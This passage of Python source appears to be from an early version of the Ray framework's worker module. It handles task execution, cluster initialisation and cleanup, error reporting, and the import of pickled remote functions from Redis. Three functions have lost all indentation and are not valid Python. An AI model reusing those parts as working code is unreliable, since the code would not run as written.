        while key not in self.imported_actor_classes:
            time.sleep(0.001)
        with self.lock:
            self.fetch_and_register_actor(key, task.required_resources(), self)
    def _wait_for_and_process_task(self, task):
        """Wait for a task to be ready and process the task.

        Handles actor creation tasks separately; for regular tasks, waits for
        the function definition to arrive, executes the task under the worker
        lock, and exits the process if the function's max_calls limit is
        reached.

        Args:
            task: The task to execute.
        """
        function_id = task.function_id()
        # TODO(rkn): It would be preferable for actor creation tasks to share
        # more of the code path with regular task execution.
        if (task.actor_creation_id() !=
                ray.local_scheduler.ObjectID(NIL_ACTOR_ID)):
            # Actor creation task: convert this worker into the actor.
            self._become_actor(task)
            return
        # Wait until the function to be executed has actually been registered
        # on this worker. We will push warnings to the user if we spend too
        # long in this loop.
        with log_span("ray:wait_for_function", worker=self):
            self._wait_for_function(function_id, task.driver_id().id())
        # Execute the task.
        # TODO(rkn): Consider acquiring this lock with a timeout and pushing a
        # warning to the user if we are waiting too long to acquire the lock
        # because that may indicate that the system is hanging, and it'd be
        # good to know where the system is hanging.
        log(event_type="ray:acquire_lock", kind=LOG_SPAN_START, worker=self)
        with self.lock:
            log(event_type="ray:acquire_lock", kind=LOG_SPAN_END,
                worker=self)
            function_name, _ = (self.functions[task.driver_id().id()]
                                [function_id.id()])
            contents = {"function_name": function_name,
                        "task_id": task.task_id().hex(),
                        "worker_id": binary_to_hex(self.worker_id)}
            with log_span("ray:task", contents=contents, worker=self):
                self._process_task(task)
        # Push all of the log events to the global state store.
        flush_log()
        # Increase the task execution counter.
        (self.num_task_executions[task.driver_id().id()]
         [function_id.id()]) += 1
        reached_max_executions = (
            self.num_task_executions[task.driver_id().id()]
            [function_id.id()] ==
            self.function_properties[task.driver_id().id()]
            [function_id.id()].max_calls)
        if reached_max_executions:
            # This worker has executed this function max_calls times;
            # disconnect and hard-exit (os._exit skips interpreter cleanup).
            ray.worker.global_worker.local_scheduler_client.disconnect()
            os._exit(0)
def _get_next_task_from_local_scheduler(self):
"""Get the next task from the local scheduler.
Returns:
A task from the local scheduler.
"""
with log_span("ray:get_task", worker=self):
task = self.local_scheduler_client.get_task()
# Automatically restrict the GPUs available to this task.
ray.utils.set_cuda_visible_devices(ray.get_gpu_ids())
return task
    def main_loop(self):
        """The main loop a worker runs to receive and execute tasks.

        Installs a SIGTERM handler that runs cleanup() before exiting, then
        loops forever fetching tasks from the local scheduler and executing
        them. This method does not return.
        """
        def exit(signum, frame):
            # Disconnect from Ray services before the process terminates.
            cleanup(worker=self)
            sys.exit(0)
        signal.signal(signal.SIGTERM, exit)
        check_main_thread()
        while True:
            task = self._get_next_task_from_local_scheduler()
            self._wait_for_and_process_task(task)
def get_gpu_ids():
    """Get the IDs of the GPUs that are available to the worker.

    If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
    started up, then the IDs returned by this method will be a subset of the
    IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
    [0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.

    Returns:
        A list of GPU IDs.

    Raises:
        Exception: If called in PYTHON_MODE.
    """
    if _mode() == PYTHON_MODE:
        raise Exception("ray.get_gpu_ids() currently does not work in PYTHON "
                        "MODE.")
    ids = global_worker.local_scheduler_client.gpu_ids()
    if global_worker.original_gpu_ids is not None:
        # CUDA_VISIBLE_DEVICES was set when the worker started, so translate
        # the scheduler's indices back into the user's original device IDs.
        ids = [global_worker.original_gpu_ids[index] for index in ids]
    return ids
def _webui_url_helper(client):
"""Parsing for getting the url of the web UI.
Args:
client: A redis client to use to query the primary Redis shard.
Returns:
The URL of the web UI as a string.
"""
result = client.hmget("webui", "url")[0]
return result.decode("ascii") if result is not None else result
def get_webui_url():
    """Get the URL to access the web UI.

    Note that the URL does not specify which node the web UI is on.

    Returns:
        The URL of the web UI as a string.

    Raises:
        Exception: If called in PYTHON_MODE.
    """
    if _mode() != PYTHON_MODE:
        return _webui_url_helper(global_worker.redis_client)
    raise Exception("ray.get_webui_url() currently does not work in "
                    "PYTHON MODE.")
# The single Worker instance for this process; all of the module-level API
# functions below operate on it.
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
# Process-wide handle for querying global cluster state (a state.GlobalState
# instance).
global_state = state.GlobalState()
class RayConnectionError(Exception):
    """Raised when a Ray command is used before Ray has been started."""
    pass
def check_main_thread():
    """Ensure that the caller is running on the main thread.

    Raises:
        Exception: If this is called from any thread other than the main
            thread.
    """
    thread_name = threading.current_thread().getName()
    if thread_name == "MainThread":
        return
    raise Exception("The Ray methods are not thread safe and must be "
                    "called from the main thread. This method was called "
                    "from thread {}."
                    .format(thread_name))
def check_connected(worker=global_worker):
    """Verify that the given worker has been connected to Ray.

    Args:
        worker: The worker to check (defaults to the process-wide worker).

    Raises:
        RayConnectionError: If the worker is not connected.
    """
    if worker.connected:
        return
    raise RayConnectionError("This command cannot be called before Ray "
                             "has been started. You can start Ray with "
                             "'ray.init()'.")
def print_failed_task(task_status):
    """Print information about failed tasks.

    Args:
        task_status (Dict): A dictionary containing the name, operationid, and
            error message for a failed task.
    """
    # The multi-line literal's leading whitespace is part of the printed
    # output on purpose.
    print("""
      Error: Task failed
        Function Name: {}
        Task ID: {}
        Error Message: \n{}
    """.format(task_status["function_name"], task_status["operationid"],
               task_status["error_message"]))
def error_applies_to_driver(error_key, worker=global_worker):
    """Return True if the error is for this driver and false otherwise."""
    # TODO(rkn): Should probably check that this is only called on a driver.
    # Error keys are formatted as in push_error_to_driver:
    # ERROR_KEY_PREFIX + driver_id + ":" + error_id.
    assert len(error_key) == (len(ERROR_KEY_PREFIX) + DRIVER_ID_LENGTH + 1 +
                              ERROR_ID_LENGTH), error_key
    prefix_length = len(ERROR_KEY_PREFIX)
    driver_id = error_key[prefix_length:prefix_length + DRIVER_ID_LENGTH]
    # A driver ID of all zero bytes means the error is intended for every
    # driver.
    if driver_id == DRIVER_ID_LENGTH * b"\x00":
        return True
    return driver_id == worker.task_driver_id.id()
def error_info(worker=global_worker):
    """Return information about failed tasks.

    Args:
        worker: The worker whose driver's errors are collected.

    Returns:
        A list of error-content dicts read from Redis.
    """
    check_connected(worker)
    check_main_thread()
    return [worker.redis_client.hgetall(error_key)
            for error_key in worker.redis_client.lrange("ErrorKeys", 0, -1)
            if error_applies_to_driver(error_key, worker=worker)]
def _initialize_serialization(worker=global_worker):
    """Initialize the serialization library.

    This defines a custom serializer for object IDs and also tells ray to
    serialize several exception classes that we define for error handling.

    Args:
        worker: The worker whose serialization context is being set up.
    """
    worker.serialization_context = pyarrow.default_serialization_context()
    # Tell the serialization context to use the cloudpickle version that we
    # ship with Ray.
    worker.serialization_context.set_pickle(pickle.dumps, pickle.loads)
    pyarrow.register_torch_serialization_handlers(worker.serialization_context)

    # Define a custom serializer and deserializer for handling Object IDs.
    def objectid_custom_serializer(obj):
        # An ObjectID is serialized as just its underlying id value.
        return obj.id()

    def objectid_custom_deserializer(serialized_obj):
        return ray.local_scheduler.ObjectID(serialized_obj)

    worker.serialization_context.register_type(
        ray.local_scheduler.ObjectID, "ray.ObjectID", pickle=False,
        custom_serializer=objectid_custom_serializer,
        custom_deserializer=objectid_custom_deserializer)

    if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
        # These should only be called on the driver because
        # register_custom_serializer will export the class to all of the
        # workers.
        register_custom_serializer(RayTaskError, use_dict=True)
        register_custom_serializer(RayGetError, use_dict=True)
        register_custom_serializer(RayGetArgumentError, use_dict=True)
        # Tell Ray to serialize lambdas with pickle.
        register_custom_serializer(type(lambda: 0), use_pickle=True)
        # Tell Ray to serialize types with pickle.
        register_custom_serializer(type(int), use_pickle=True)
        # Ray can serialize actor handles that have been wrapped.
        register_custom_serializer(ray.actor.ActorHandleWrapper,
                                   use_dict=True)
        # Tell Ray to serialize FunctionSignatures as dictionaries. This is
        # used when passing around actor handles.
        register_custom_serializer(ray.signature.FunctionSignature,
                                   use_dict=True)
def get_address_info_from_redis_helper(redis_address, node_ip_address):
    """Query Redis once for the addresses of Ray services on one node.

    Args:
        redis_address (str): The "ip:port" address of the Redis server.
        node_ip_address (str): The IP address of the node whose services we
            want to find.

    Returns:
        A dict with keys "node_ip_address", "redis_address",
        "object_store_addresses", "local_scheduler_socket_names", and
        "webui_url".

    Raises:
        AssertionError: If no live plasma manager or local scheduler has
            registered for this node yet.
    """
    redis_ip_address, redis_port = redis_address.split(":")
    # For this command to work, some other client (on the same machine as
    # Redis) must have run "CONFIG SET protected-mode no".
    redis_client = redis.StrictRedis(host=redis_ip_address,
                                     port=int(redis_port))
    # The client table prefix must be kept in sync with the file
    # "src/common/redis_module/ray_redis_module.cc" where it is defined.
    REDIS_CLIENT_TABLE_PREFIX = "CL:"
    client_keys = redis_client.keys("{}*".format(REDIS_CLIENT_TABLE_PREFIX))
    # Filter to live clients on the same node and do some basic checking.
    plasma_managers = []
    local_schedulers = []
    for key in client_keys:
        info = redis_client.hgetall(key)
        # Ignore clients that were deleted.
        deleted = info[b"deleted"]
        deleted = bool(int(deleted))
        if deleted:
            continue
        assert b"ray_client_id" in info
        assert b"node_ip_address" in info
        assert b"client_type" in info
        # Accept clients registered with 127.0.0.1 when Redis runs locally.
        client_node_ip_address = info[b"node_ip_address"].decode("ascii")
        if (client_node_ip_address == node_ip_address or
                (client_node_ip_address == "127.0.0.1" and
                 redis_ip_address == ray.services.get_node_ip_address())):
            if info[b"client_type"].decode("ascii") == "plasma_manager":
                plasma_managers.append(info)
            elif info[b"client_type"].decode("ascii") == "local_scheduler":
                local_schedulers.append(info)
    # Make sure that we got at least one plasma manager and local scheduler.
    assert len(plasma_managers) >= 1
    assert len(local_schedulers) >= 1
    # Build the address information.
    object_store_addresses = []
    for manager in plasma_managers:
        address = manager[b"manager_address"].decode("ascii")
        port = services.get_port(address)
        object_store_addresses.append(
            services.ObjectStoreAddress(
                name=manager[b"store_socket_name"].decode("ascii"),
                manager_name=manager[b"manager_socket_name"].decode("ascii"),
                manager_port=port))
    scheduler_names = [
        scheduler[b"local_scheduler_socket_name"].decode("ascii")
        for scheduler in local_schedulers]
    client_info = {"node_ip_address": node_ip_address,
                   "redis_address": redis_address,
                   "object_store_addresses": object_store_addresses,
                   "local_scheduler_socket_names": scheduler_names,
                   # Web UI should be running.
                   "webui_url": _webui_url_helper(redis_client)}
    return client_info
def get_address_info_from_redis(redis_address, node_ip_address, num_retries=5):
    """Query Redis for cluster address info, retrying while it populates.

    Args:
        redis_address (str): The "ip:port" address of the Redis server.
        node_ip_address (str): The IP address of the node of interest.
        num_retries (int): How many additional attempts to make (one second
            apart) before giving up and re-raising the last error.

    Returns:
        The address-info dict from get_address_info_from_redis_helper.
    """
    attempts = 0
    while True:
        try:
            return get_address_info_from_redis_helper(redis_address,
                                                      node_ip_address)
        except Exception:
            if attempts == num_retries:
                raise
            # Some of the information may not be in Redis yet, so wait a
            # little bit before trying again.
            print("Some processes that the driver needs to connect to have "
                  "not registered with Redis, so retrying. Have you run "
                  "'ray start' on this node?")
            time.sleep(1)
            attempts += 1
def _normalize_resource_arguments(num_cpus, num_gpus, resources,
num_local_schedulers):
"""Stick the CPU and GPU arguments into the resources dictionary.
This also checks that the arguments are well-formed.
Args:
num_cpus: Either a number of CPUs or a list of numbers of CPUs.
num_gpus: Either a number of CPUs or a list of numbers of CPUs.
resources: Either a dictionary of resource mappings or a list of
dictionaries of resource mappings.
num_local_schedulers: The number of local schedulers.
Returns:
A list of dictionaries of resources of length num_local_schedulers.
"""
if resources is None:
resources = {}
if not isinstance(num_cpus, list):
num_cpus = num_local_schedulers * [num_cpus]
if not isinstance(num_gpus, list):
num_gpus = num_local_schedulers * [num_gpus]
if not isinstance(resources, list):
resources = num_local_schedulers * [resources]
new_resources = [r.copy() for r in resources]
for i in range(num_local_schedulers):
assert "CPU" not in new_resources[i], "Use the 'num_cpus' argument."
assert "GPU" not in new_resources[i], "Use the 'num_gpus' argument."
if num_cpus[i] is not None:
new_resources[i]["CPU"] = num_cpus[i]
if num_gpus[i] is not None:
new_resources[i]["GPU"] = num_gpus[i]
return new_resources
def _init(address_info=None,
          start_ray_local=False,
          object_id_seed=None,
          num_workers=None,
          num_local_schedulers=None,
          object_store_memory=None,
          driver_mode=SCRIPT_MODE,
          redirect_worker_output=False,
          redirect_output=True,
          start_workers_from_local_scheduler=True,
          num_cpus=None,
          num_gpus=None,
          resources=None,
          num_redis_shards=None,
          redis_max_clients=None,
          plasma_directory=None,
          huge_pages=False,
          include_webui=True):
    """Helper method to connect to an existing Ray cluster or start a new one.

    This method handles two cases. Either a Ray cluster already exists and we
    just attach this driver to it, or we start all of the processes associated
    with a Ray cluster and attach to the newly started cluster.

    Args:
        address_info (dict): A dictionary with address information for
            processes in a partially-started Ray cluster. If
            start_ray_local=True, any processes not in this dictionary will be
            started. If provided, an updated address_info dictionary will be
            returned to include processes that are newly started.
        start_ray_local (bool): If True then this will start any processes not
            already in address_info, including Redis, a global scheduler, local
            scheduler(s), object store(s), and worker(s). It will also kill
            these processes when Python exits. If False, this will attach to an
            existing Ray cluster.
        object_id_seed (int): Used to seed the deterministic generation of
            object IDs. The same value can be used across multiple runs of the
            same job in order to generate the object IDs in a consistent
            manner. However, the same ID should not be used for different jobs.
        num_workers (int): The number of workers to start. This is only
            provided if start_ray_local is True.
        num_local_schedulers (int): The number of local schedulers to start.
            This is only provided if start_ray_local is True.
        object_store_memory: The amount of memory (in bytes) to start the
            object store with.
        driver_mode (bool): The mode in which to start the driver. This should
            be one of ray.SCRIPT_MODE, ray.PYTHON_MODE, and ray.SILENT_MODE.
        redirect_worker_output: True if the stdout and stderr of worker
            processes should be redirected to files.
        redirect_output (bool): True if stdout and stderr for non-worker
            processes should be redirected to files and false otherwise.
        start_workers_from_local_scheduler (bool): If this flag is True, then
            start the initial workers from the local scheduler. Else, start
            them from Python. The latter case is for debugging purposes only.
        num_cpus (int): Number of cpus the user wishes all local schedulers to
            be configured with.
        num_gpus (int): Number of gpus the user wishes all local schedulers to
            be configured with. If unspecified, Ray will attempt to autodetect
            the number of GPUs available on the node (note that autodetection
            currently only works for Nvidia GPUs).
        resources: A dictionary mapping resource names to the quantity of that
            resource available.
        num_redis_shards: The number of Redis shards to start in addition to
            the primary Redis shard.
        redis_max_clients: If provided, attempt to configure Redis with this
            maxclients number.
        plasma_directory: A directory where the Plasma memory mapped files will
            be created.
        huge_pages: Boolean flag indicating whether to start the Object
            Store with hugetlbfs support. Requires plasma_directory.
        include_webui: Boolean flag indicating whether to start the web
            UI, which is a Jupyter notebook.

    Returns:
        Address information about the started processes.

    Raises:
        Exception: An exception is raised if an inappropriate combination of
            arguments is passed in.
    """
    check_main_thread()
    if driver_mode not in [SCRIPT_MODE, PYTHON_MODE, SILENT_MODE]:
        raise Exception("Driver_mode must be in [ray.SCRIPT_MODE, "
                        "ray.PYTHON_MODE, ray.SILENT_MODE].")

    # Get addresses of existing services.
    if address_info is None:
        address_info = {}
    else:
        assert isinstance(address_info, dict)
    node_ip_address = address_info.get("node_ip_address")
    redis_address = address_info.get("redis_address")

    # Start any services that do not yet exist.
    if driver_mode == PYTHON_MODE:
        # If starting Ray in PYTHON_MODE, don't start any other processes.
        pass
    elif start_ray_local:
        # In this case, we launch a scheduler, a new object store, and some
        # workers, and we connect to them. We do not launch any processes that
        # are already registered in address_info.
        # Use the address 127.0.0.1 in local mode.
        node_ip_address = ("127.0.0.1" if node_ip_address is None
                          else node_ip_address)
        # Use 1 local scheduler if num_local_schedulers is not provided. If
        # existing local schedulers are provided, use that count as
        # num_local_schedulers.
        local_schedulers = address_info.get("local_scheduler_socket_names", [])
        if num_local_schedulers is None:
            if len(local_schedulers) > 0:
                num_local_schedulers = len(local_schedulers)
            else:
                num_local_schedulers = 1
        # Use 1 additional redis shard if num_redis_shards is not provided.
        num_redis_shards = 1 if num_redis_shards is None else num_redis_shards
        # Stick the CPU and GPU resources into the resource dictionary.
        resources = _normalize_resource_arguments(num_cpus, num_gpus,
                                                  resources,
                                                  num_local_schedulers)
        # Start the scheduler, object store, and some workers. These will be
        # killed by the call to cleanup(), which happens when the Python script
        # exits.
        address_info = services.start_ray_head(
            address_info=address_info,
            node_ip_address=node_ip_address,
            num_workers=num_workers,
            num_local_schedulers=num_local_schedulers,
            object_store_memory=object_store_memory,
            redirect_worker_output=redirect_worker_output,
            redirect_output=redirect_output,
            start_workers_from_local_scheduler=(
                start_workers_from_local_scheduler),
            resources=resources,
            num_redis_shards=num_redis_shards,
            redis_max_clients=redis_max_clients,
            plasma_directory=plasma_directory,
            huge_pages=huge_pages,
            include_webui=include_webui)
    else:
        # Attaching to an existing cluster: reject every argument that only
        # makes sense when starting a new cluster.
        if redis_address is None:
            raise Exception("When connecting to an existing cluster, "
                            "redis_address must be provided.")
        if num_workers is not None:
            raise Exception("When connecting to an existing cluster, "
                            "num_workers must not be provided.")
        if num_local_schedulers is not None:
            raise Exception("When connecting to an existing cluster, "
                            "num_local_schedulers must not be provided.")
        if num_cpus is not None or num_gpus is not None:
            raise Exception("When connecting to an existing cluster, num_cpus "
                            "and num_gpus must not be provided.")
        if resources is not None:
            raise Exception("When connecting to an existing cluster, "
                            "resources must not be provided.")
        if num_redis_shards is not None:
            raise Exception("When connecting to an existing cluster, "
                            "num_redis_shards must not be provided.")
        if redis_max_clients is not None:
            raise Exception("When connecting to an existing cluster, "
                            "redis_max_clients must not be provided.")
        if object_store_memory is not None:
            raise Exception("When connecting to an existing cluster, "
                            "object_store_memory must not be provided.")
        if plasma_directory is not None:
            raise Exception("When connecting to an existing cluster, "
                            "plasma_directory must not be provided.")
        if huge_pages:
            raise Exception("When connecting to an existing cluster, "
                            "huge_pages must not be provided.")
        # Get the node IP address if one is not provided.
        if node_ip_address is None:
            node_ip_address = services.get_node_ip_address(redis_address)
        # Get the address info of the processes to connect to from Redis.
        address_info = get_address_info_from_redis(redis_address,
                                                   node_ip_address)

    # Connect this driver to Redis, the object store, and the local scheduler.
    # Choose the first object store and local scheduler if there are multiple.
    # The corresponding call to disconnect will happen in the call to cleanup()
    # when the Python script exits.
    if driver_mode == PYTHON_MODE:
        driver_address_info = {}
    else:
        driver_address_info = {
            "node_ip_address": node_ip_address,
            "redis_address": address_info["redis_address"],
            "store_socket_name": (
                address_info["object_store_addresses"][0].name),
            "manager_socket_name": (
                address_info["object_store_addresses"][0].manager_name),
            "local_scheduler_socket_name": (
                address_info["local_scheduler_socket_names"][0]),
            "webui_url": address_info["webui_url"]}
    connect(driver_address_info, object_id_seed=object_id_seed,
            mode=driver_mode, worker=global_worker)
    return address_info
def init(redis_address=None, node_ip_address=None, object_id_seed=None,
         num_workers=None, driver_mode=SCRIPT_MODE,
         redirect_worker_output=False, redirect_output=True,
         num_cpus=None, num_gpus=None, resources=None,
         num_custom_resource=None, num_redis_shards=None,
         redis_max_clients=None, plasma_directory=None,
         huge_pages=False, include_webui=True, object_store_memory=None):
    """Connect to an existing Ray cluster or start one and connect to it.

    If redis_address is given, this driver attaches to the already-running
    cluster at that address. Otherwise a new local cluster (Redis, a global
    scheduler, a local scheduler, a plasma store, a plasma manager, and some
    workers) is started, and those processes are killed when Python exits.

    Args:
        node_ip_address (str): The IP address of the node that we are on.
        redis_address (str): The address of the Redis server to connect to.
            When omitted, a new cluster is started locally.
        object_id_seed (int): Seed for the deterministic generation of object
            IDs, so repeated runs of the same job produce the same IDs. The
            same seed should not be reused across different jobs.
        num_workers (int): The number of workers to start. Only valid when
            redis_address is not provided.
        driver_mode (bool): One of ray.SCRIPT_MODE, ray.PYTHON_MODE, and
            ray.SILENT_MODE.
        redirect_worker_output: True if the stdout and stderr of worker
            processes should be redirected to files.
        redirect_output (bool): True if stdout and stderr of non-worker
            processes should be redirected to files.
        num_cpus (int): Number of CPUs to configure each local scheduler
            with.
        num_gpus (int): Number of GPUs to configure each local scheduler
            with.
        resources: A dictionary mapping resource names to the quantity of
            that resource available.
        num_custom_resource: Accepted for backward compatibility; this
            argument is not forwarded anywhere and has no effect.
        num_redis_shards: The number of Redis shards to start in addition to
            the primary Redis shard.
        redis_max_clients: If provided, attempt to configure Redis with this
            maxclients number.
        plasma_directory: A directory where the Plasma memory mapped files
            will be created.
        huge_pages: Boolean flag indicating whether to start the Object
            Store with hugetlbfs support. Requires plasma_directory.
        include_webui: Boolean flag indicating whether to start the web UI,
            which is a Jupyter notebook.
        object_store_memory: The amount of memory (in bytes) to start the
            object store with.

    Returns:
        Address information about the started processes.

    Raises:
        Exception: An exception is raised if an inappropriate combination of
            arguments is passed in.
    """
    # Resolve hostnames to numerical IP addresses before anything else uses
    # them.
    if node_ip_address is not None:
        node_ip_address = services.address_to_ip(node_ip_address)
    if redis_address is not None:
        redis_address = services.address_to_ip(redis_address)

    partial_address_info = {
        "node_ip_address": node_ip_address,
        "redis_address": redis_address,
    }
    # A missing redis_address means there is no cluster to attach to, so ask
    # _init to start one locally.
    return _init(address_info=partial_address_info,
                 start_ray_local=redis_address is None,
                 num_workers=num_workers,
                 driver_mode=driver_mode,
                 redirect_worker_output=redirect_worker_output,
                 redirect_output=redirect_output,
                 num_cpus=num_cpus,
                 num_gpus=num_gpus,
                 resources=resources,
                 num_redis_shards=num_redis_shards,
                 redis_max_clients=redis_max_clients,
                 plasma_directory=plasma_directory,
                 huge_pages=huge_pages,
                 include_webui=include_webui,
                 object_store_memory=object_store_memory)
def cleanup(worker=global_worker):
    """Disconnect the worker, and terminate any processes started in init.

    This will automatically run at the end when a Python process that uses
    Ray exits. It is ok to run this twice in a row. Note that we manually
    call services.cleanup() in the tests because we need to start and stop
    many clusters in the tests, but the import and exit only happen once.

    Args:
        worker: The worker to disconnect and clean up after.
    """
    disconnect(worker)
    # Drop handles to external services if the worker ever created them.
    if hasattr(worker, "local_scheduler_client"):
        del worker.local_scheduler_client
    if hasattr(worker, "plasma_client"):
        worker.plasma_client.disconnect()

    if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
        # If this is a driver, push the finish time to Redis and clean up any
        # other services that were started with the driver.
        worker.redis_client.hmset(b"Drivers:" + worker.worker_id,
                                  {"end_time": time.time()})
        services.cleanup()
    else:
        # If this is not a driver, make sure there are no orphan processes,
        # besides possibly the worker itself. (The asserts were previously
        # written as `assert(...) <= 1`, which reads as if only the inner
        # expression were asserted; the comparison is the condition.)
        for process_type, processes in services.all_processes.items():
            if process_type == services.PROCESS_TYPE_WORKER:
                assert len(processes) <= 1
            else:
                assert len(processes) == 0
    worker.set_mode(None)
# Run cleanup() automatically when the interpreter exits so driver-started
# services are torn down.
atexit.register(cleanup)

# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(exc_type, exc_value, exc_traceback):
    """Record uncaught driver exceptions in Redis, then delegate.

    Installed as sys.excepthook; the interpreter calls it positionally with
    (type, value, traceback), so the parameters are renamed here to avoid
    shadowing the builtin `type`.
    """
    # If this is a driver, push the exception to redis.
    if global_worker.mode in [SCRIPT_MODE, SILENT_MODE]:
        error_message = "".join(traceback.format_tb(exc_traceback))
        global_worker.redis_client.hmset(
            b"Drivers:" + global_worker.worker_id,
            {"exception": error_message})
    # Call the normal excepthook.
    normal_excepthook(exc_type, exc_value, exc_traceback)
sys.excepthook = custom_excepthook
def print_error_messages(worker):
    """Print error messages in the background on the driver.

    This runs in a separate thread on the driver and prints error messages in
    the background.

    Args:
        worker: The worker whose Redis connection is used to read errors.
    """
    # TODO(rkn): All error messages should have a "component" field indicating
    # which process the error came from (e.g., a worker or a plasma store).
    # Currently all error messages come from workers.

    helpful_message = """
You can inspect errors by running

    ray.error_info()

If this driver is hanging, start a new one with

    ray.init(redis_address="{}")
""".format(worker.redis_address)

    worker.error_message_pubsub_client = worker.redis_client.pubsub()
    # Exports that are published after the call to
    # error_message_pubsub_client.subscribe and before the call to
    # error_message_pubsub_client.listen will still be processed in the loop.
    worker.error_message_pubsub_client.subscribe("__keyspace@0__:ErrorKeys")
    num_errors_received = 0

    # Get the exports that occurred before the call to subscribe.
    # NOTE: num_errors_received counts every key seen (not only those printed)
    # so that the lrange below resumes at the right offset.
    with worker.lock:
        error_keys = worker.redis_client.lrange("ErrorKeys", 0, -1)
        for error_key in error_keys:
            if error_applies_to_driver(error_key, worker=worker):
                error_message = worker.redis_client.hget(
                    error_key, "message").decode("ascii")
                print(error_message)
                print(helpful_message)
            num_errors_received += 1

    try:
        for msg in worker.error_message_pubsub_client.listen():
            with worker.lock:
                for error_key in worker.redis_client.lrange(
                        "ErrorKeys", num_errors_received, -1):
                    if error_applies_to_driver(error_key, worker=worker):
                        error_message = worker.redis_client.hget(
                            error_key, "message").decode("ascii")
                        print(error_message)
                        print(helpful_message)
                    num_errors_received += 1
    except redis.ConnectionError:
        # When Redis terminates the listen call will throw a ConnectionError,
        # which we catch here.
        pass
def fetch_and_register_remote_function(key, worker=global_worker):
    """Import a remote function.

    Reads the exported function's metadata and pickled definition from the
    Redis hash at `key`, registers a raising placeholder first, and then
    replaces it with the real function if unpickling succeeds.

    Args:
        key: The Redis key (bytes) under which the function was exported.
        worker: The worker to register the function on.
    """
    (driver_id, function_id_str, function_name,
     serialized_function, num_return_vals, module, resources,
     max_calls) = worker.redis_client.hmget(
         key, ["driver_id",
               "function_id",
               "name",
               "function",
               "num_return_vals",
               "module",
               "resources",
               "max_calls"])
    function_id = ray.local_scheduler.ObjectID(function_id_str)
    function_name = function_name.decode("ascii")
    function_properties = FunctionProperties(
        num_return_vals=int(num_return_vals),
        resources=json.loads(resources.decode("ascii")),
        max_calls=int(max_calls))
    module = module.decode("ascii")

    # This is a placeholder in case the function can't be unpickled. This will
    # be overwritten if the function is successfully registered.
    def f():
        raise Exception("This function was not imported properly.")
    remote_f_placeholder = remote(function_id=function_id)(lambda *xs: f())
    worker.functions[driver_id][function_id.id()] = (function_name,
                                                     remote_f_placeholder)
    worker.function_properties[driver_id][function_id.id()] = (
        function_properties)
    worker.num_task_executions[driver_id][function_id.id()] = 0

    try:
        function = pickle.loads(serialized_function)
    except Exception:
        # If an exception was thrown when the remote function was imported, we
        # record the traceback and notify the scheduler of the failure.
        traceback_str = ray.utils.format_error_message(traceback.format_exc())
        # Log the error message.
        ray.utils.push_error_to_driver(worker.redis_client,
                                       "register_remote_function",
                                       traceback_str,
                                       driver_id=driver_id,
                                       data={"function_id": function_id.id(),
                                             "function_name": function_name})
    else:
        # TODO(rkn): Why is the below line necessary?
        function.__module__ = module
        worker.functions[driver_id][function_id.id()] = (
            function_name, remote(function_id=function_id)(function))
        # Add the function to the function table.
        worker.redis_client.rpush(b"FunctionTable:" + function_id.id(),
                                  worker.worker_id)
def fetch_and_execute_function_to_run(key, worker=global_worker):
    """Run on arbitrary function on the worker.

    Args:
        key: The Redis key (bytes) under which the function was exported.
        worker: The worker to run the function on.
    """
    driver_id, serialized_function = worker.redis_client.hmget(
        key, ["driver_id", "function"])
    if (worker.mode in [SCRIPT_MODE, SILENT_MODE] and
            driver_id != worker.task_driver_id.id()):
        # This export was from a different driver and there's no need for this
        # driver to import it.
        return
    try:
        # Deserialize the function.
        function = pickle.loads(serialized_function)
        # Run the function.
        function({"worker": worker})
    except Exception:
        # If an exception was thrown when the function was run, we record the
        # traceback and notify the scheduler of the failure.
        traceback_str = traceback.format_exc()
        # Log the error message. The locals() check guards against `function`
        # being unbound when pickle.loads itself raised.
        name = function.__name__ if ("function" in locals() and
                                     hasattr(function, "__name__")) else ""
        ray.utils.push_error_to_driver(worker.redis_client,
                                       "function_to_run",
                                       traceback_str,
                                       driver_id=driver_id,
                                       data={"name": name})
def import_thread(worker, mode):
    """Fetch and apply exports (remote functions, actor classes) from Redis.

    First processes any exports published before the subscribe call, then
    listens on the keyspace channel for new entries in the "Exports" list and
    imports them in order. Drivers only import FunctionsToRun; workers import
    everything.

    Args:
        worker: The worker to apply the imports to.
        mode: The mode of `worker` (WORKER_MODE or one of the driver modes).
    """
    worker.import_pubsub_client = worker.redis_client.pubsub()
    # Exports that are published after the call to
    # import_pubsub_client.subscribe and before the call to
    # import_pubsub_client.listen will still be processed in the loop.
    worker.import_pubsub_client.subscribe("__keyspace@0__:Exports")
    # Keep track of the number of imports that we've imported.
    num_imported = 0

    # Get the exports that occurred before the call to subscribe.
    with worker.lock:
        export_keys = worker.redis_client.lrange("Exports", 0, -1)
        for key in export_keys:
            num_imported += 1

            # Handle the driver case first.
            if mode != WORKER_MODE:
                if key.startswith(b"FunctionsToRun"):
                    fetch_and_execute_function_to_run(key, worker=worker)
                # Continue because FunctionsToRun are the only things that the
                # driver should import.
                continue

            if key.startswith(b"RemoteFunction"):
                fetch_and_register_remote_function(key, worker=worker)
            elif key.startswith(b"FunctionsToRun"):
                fetch_and_execute_function_to_run(key, worker=worker)
            elif key.startswith(b"ActorClass"):
                # Keep track of the fact that this actor class has been
                # exported so that we know it is safe to turn this worker into
                # an actor of that class.
                worker.imported_actor_classes.add(key)
            else:
                raise Exception("This code should be unreachable.")

    try:
        for msg in worker.import_pubsub_client.listen():
            with worker.lock:
                if msg["type"] == "subscribe":
                    continue
                assert msg["data"] == b"rpush"
                num_imports = worker.redis_client.llen("Exports")
                assert num_imports >= num_imported
                for i in range(num_imported, num_imports):
                    num_imported += 1
                    key = worker.redis_client.lindex("Exports", i)

                    # Handle the driver case first.
                    if mode != WORKER_MODE:
                        if key.startswith(b"FunctionsToRun"):
                            with log_span("ray:import_function_to_run",
                                          worker=worker):
                                fetch_and_execute_function_to_run(
                                    key, worker=worker)
                        # Continue because FunctionsToRun are the only things
                        # that the driver should import.
                        continue

                    if key.startswith(b"RemoteFunction"):
                        with log_span("ray:import_remote_function",
                                      worker=worker):
                            fetch_and_register_remote_function(key,
                                                               worker=worker)
